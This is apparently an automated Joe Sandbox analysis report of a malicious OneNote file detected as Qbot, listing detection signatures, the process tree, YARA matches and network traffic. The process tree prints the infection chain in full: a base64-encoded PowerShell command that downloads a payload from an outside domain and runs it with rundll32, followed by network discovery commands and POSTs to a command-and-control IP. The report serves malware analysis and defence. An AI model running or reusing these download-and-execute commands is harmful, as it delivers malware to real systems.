Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Note.one

Overview

General Information

Sample Name:Note.one
Analysis ID:800757
MD5:95f95c0cda4f5b050fdca00b02323d88
SHA1:ec1daeab8b4aee1abeec3df3b82efe314c328bb9
SHA256:636f8f5fa6d17d092007a750a38cbe4d171e608eab5b8264dbfa35209529cb9a
Infos:

Detection

Qbot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Qbot
Sigma detected: Execute DLL with spoofed extension
DLL reload attack detected
Malicious sample detected (through community Yara rule)
Uses netstat to query active network connections and open ports
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Queries memory information (via WMI often done to detect virtual machines)
Allocates memory in foreign processes
Powershell drops PE file
Uses ipconfig to lookup or modify the Windows network settings
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Document exploit detected (process start blacklist hit)
Gathers network related connection and port information
Writes to foreign memory regions
Renames NTDLL to bypass HIPS
Suspicious powershell command line found
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Uses whoami command line tool to query computer and username
Performs a network lookup / discovery via net view
Performs a network lookup / discovery via ARP
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Binary contains a suspicious time stamp
Creates a start menu entry (Start Menu\Programs\Startup)
Dropped file seen in connection with other malware
PE file overlay found
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
PE file contains sections with non-standard names
Contains functionality to call native functions
PE file contains executable resources (Code or Archives)
Enables debug privileges
AV process strings found (often used to terminate AV products)
PE file does not import any functions
PE file contains an invalid checksum
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Classification

  • System is w10x64native
  • ONENOTE.EXE (PID: 3424 cmdline: C:\Program Files\Microsoft Office\Root\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\Note.one MD5: 59056F600C4366EE07277C20A90DAF67)
    • ONENOTEM.EXE (PID: 424 cmdline: /tsr MD5: 377069572D48FFBF1EA2DA466A61B398)
  • cmd.exe (PID: 7260 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Open.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 7684 cmdline: powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnBvd2Vyc2hlbGwgSW52b2tlLVdlYlJlcXVlc3QgLVVSSSBodHRwczovL3Rhc3NvaW5tb2JpbGlhcmlhLmNvbS81NkcwLzAxLmdpZiAtT3V0RmlsZSBDOlxwcm9ncmFtZGF0YVxwdXR0eS5qcGcNCnJ1bmRsbDMyIEM6XHByb2dyYW1kYXRhXHB1dHR5LmpwZyxXaW5kDQpleGl0DQo=')) MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 4944 cmdline: C:\Windows\system32\cmd.exe /K C:\ProgramData\in.cmd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 4624 cmdline: powershell Invoke-WebRequest -URI https://tassoinmobiliaria.com/56G0/01.gif -OutFile C:\programdata\putty.jpg MD5: 04029E121A0CFA5991749937DD22A1D9)
      • rundll32.exe (PID: 7240 cmdline: rundll32 C:\programdata\putty.jpg,Wind MD5: EF3179D498793BF4234F708D3BE28633)
        • rundll32.exe (PID: 6316 cmdline: rundll32 C:\programdata\putty.jpg,Wind MD5: 889B99C52A60DD49227C5E485A016679)
          • backgroundTaskHost.exe (PID: 4564 cmdline: C:\Windows\SysWOW64\backgroundTaskHost.exe MD5: F290D12F0351B56708B3DF1EC26CB45B)
            • net.exe (PID: 2164 cmdline: net view MD5: 31890A7DE89936F922D44D677F681A7F)
              • conhost.exe (PID: 3380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
            • cmd.exe (PID: 4132 cmdline: cmd /c set MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 8056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
            • ARP.EXE (PID: 4176 cmdline: arp -a MD5: 4D3943EDBC9C7E18DC3469A21B30B3CE)
              • conhost.exe (PID: 1516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
            • ipconfig.exe (PID: 4348 cmdline: ipconfig /all MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
              • conhost.exe (PID: 5236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
            • net.exe (PID: 5252 cmdline: net share MD5: 31890A7DE89936F922D44D677F681A7F)
              • conhost.exe (PID: 2708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
              • net1.exe (PID: 8176 cmdline: C:\Windows\system32\net1 share MD5: 207DEB8572F128E9AE8062D9CF3A6E8A)
            • ROUTE.EXE (PID: 8140 cmdline: route print MD5: C563191ED28A926BCFDB1071374575F1)
              • conhost.exe (PID: 3136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
            • NETSTAT.EXE (PID: 7728 cmdline: netstat -nao MD5: 9DB170ED520A6DD57B5AC92EC537368A)
              • conhost.exe (PID: 2248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
            • net.exe (PID: 2836 cmdline: net localgroup MD5: 31890A7DE89936F922D44D677F681A7F)
              • conhost.exe (PID: 6920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
              • net1.exe (PID: 4216 cmdline: C:\Windows\system32\net1 localgroup MD5: 207DEB8572F128E9AE8062D9CF3A6E8A)
            • whoami.exe (PID: 4672 cmdline: whoami /all MD5: 801D9A1C1108360B84E60A457D5A773A)
              • conhost.exe (PID: 7472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • ONENOTEM.EXE (PID: 2792 cmdline: "C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE" /tsr MD5: 377069572D48FFBF1EA2DA466A61B398)
  • msiexec.exe (PID: 3180 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
0000000D.00000002.5726437418.0000000000ADA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
    Process Memory Space: powershell.exe PID: 7684INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0x20323:$b2: ::FromBase64String(
    • 0x367bc:$b2: ::FromBase64String(
    • 0x368fa:$b2: ::FromBase64String(
    • 0x379ba:$b2: ::FromBase64String(
    • 0x37afa:$b2: ::FromBase64String(
    • 0x37dda:$b2: ::FromBase64String(
    • 0x37f41:$b2: ::FromBase64String(
    • 0x3807f:$b2: ::FromBase64String(
    • 0x56e87:$b2: ::FromBase64String(
    • 0x5b3f4:$b2: ::FromBase64String(
    • 0x79fe4:$b2: ::FromBase64String(
    • 0xa5bc9:$b2: ::FromBase64String(
    • 0xa5d08:$b2: ::FromBase64String(
    • 0xa6027:$b2: ::FromBase64String(
    • 0xa6321:$b2: ::FromBase64String(
    • 0xd5561:$b2: ::FromBase64String(
    • 0xd56a0:$b2: ::FromBase64String(
    • 0xd6050:$b2: ::FromBase64String(
    • 0xd62e5:$b2: ::FromBase64String(
    • 0xd6547:$b2: ::FromBase64String(
    • 0xd6a1b:$b2: ::FromBase64String(
    SourceRuleDescriptionAuthorStrings
    13.2.rundll32.exe.10000000.1.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
      13.2.rundll32.exe.aed640.0.raw.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
        13.2.rundll32.exe.aed640.0.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security

          Data Obfuscation

          barindex
          Source: Process startedAuthor: Joe Security: Data: Command: rundll32 C:\programdata\putty.jpg,Wind, CommandLine: rundll32 C:\programdata\putty.jpg,Wind, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K C:\ProgramData\in.cmd, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4944, ParentProcessName: cmd.exe, ProcessCommandLine: rundll32 C:\programdata\putty.jpg,Wind, ProcessId: 7240, ProcessName: rundll32.exe
          No Snort rule has matched

          Click to jump to signature section

          Show All Signature Results
          Source: unknownHTTPS traffic detected: 148.163.69.171:443 -> 192.168.11.20:49827 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 50.112.202.115:443 -> 192.168.11.20:49836 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 87.149.176.97:443 -> 192.168.11.20:49838 version: TLS 1.2
          Source: Binary string: amstream.pdb source: backgroundTaskHost.exe, 0000000E.00000003.5728609829.0000000004551000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: 6153a066.dll.13.dr
          Source: Binary string: wntdll.pdb source: 6153a066.dll.13.dr
          Source: Binary string: amstream.pdbGCTL source: backgroundTaskHost.exe, 0000000E.00000003.5728609829.0000000004551000.00000004.00000020.00020000.00000000.sdmp

          Spreading

          barindex
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeProcess created: C:\Windows\SysWOW64\net.exe net view
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeProcess created: C:\Windows\SysWOW64\net.exe net viewJump to behavior
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeProcess created: C:\Windows\SysWOW64\ARP.EXE arp -a
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeProcess created: C:\Windows\SysWOW64\ARP.EXE arp -aJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\catroot2Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SYSTEM32\en-US\tzres.dll.muiJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\eed480a49b61c30993f5872af5a0685e\Microsoft.PowerShell.Security.ni.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SYSTEM32\profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clrjit.dllJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_1000C547 FindFirstFileW,FindNextFileW,13_2_1000C547

          Software Vulnerabilities

          barindex
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEProcess created: C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE

          Networking

          barindex
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE netstat -nao
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: global trafficHTTP traffic detected: GET /56G0/01.gif HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: tassoinmobiliaria.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: broadcom.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /t5 HTTP/1.1Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 87.149.176.97Content-Length: 80Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /t5 HTTP/1.1Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 87.149.176.97Content-Length: 16611526Cache-Control: no-cache
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
          Source: powershell.exe, 00000008.00000002.5658996617.000002AA697F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
          Source: powershell.exe, 00000008.00000002.5658996617.000002AA697A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.
          Source: powershell.exe, 00000008.00000002.5658996617.000002AA697A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
          Source: powershell.exe, 00000008.00000002.5649681111.000002AA513E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: http://weather.service.msn.com/data.aspx
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://addinslicensing.store.office.com/apps/remove
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
          Source: powershell.exe, 00000008.00000002.5649681111.000002AA513A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
          Source: powershell.exe, 00000008.00000002.5649681111.000002AA513BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://analysis.windows.net/powerbi/api
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://api.aadrm.com
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://api.aadrm.com/
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://api.addins.store.office.com/app/query
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://api.cortana.ai
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://api.diagnostics.office.com
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://api.diagnosticssdf.office.com
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://api.microsoftstream.com/api/
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://api.office.net
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://api.onedrive.com
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/imports
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://api.scheduler.
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://apis.live.net/v5.0/
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://arc.msn.com/v4/api/selection
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://augloop.office.com
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://augloop.office.com/v2
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://autodiscover-s.outlook.com/
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
          Source: FGR8SNK3.htm.14.drString found in binary or memory: https://cdn.cookielaw.org/scripttemplates/otSDKStub.js
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://cdn.entity.
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://clients.config.office.net/
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://config.edge.skype.com
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://consent.config.office.com/consentcheckin/v1.0/consents
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://consent.config.office.com/consentweb/v1.0/consents
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://cortana.ai
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://cortana.ai/api
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://cr.office.com
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://d.docs.live.net
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://dataservice.o365filtering.com
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://dataservice.o365filtering.com/
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://dev.cortana.ai
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://devnull.onenote.com
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://directory.services.
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://ecs.office.com/config/v2/Office
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://enrichment.osi.office.net/
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/v2.1601292631425
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://entitlement.diagnostics.office.com
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://fpastorage.cdn.office.net/%s
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://fpastorage.cdn.office.net/firstpartyapp/addins.xml
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://globaldisco.crm.dynamics.com
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://graph.ppe.windows.net
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://graph.ppe.windows.net/
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://graph.windows.net
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://graph.windows.net/
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos
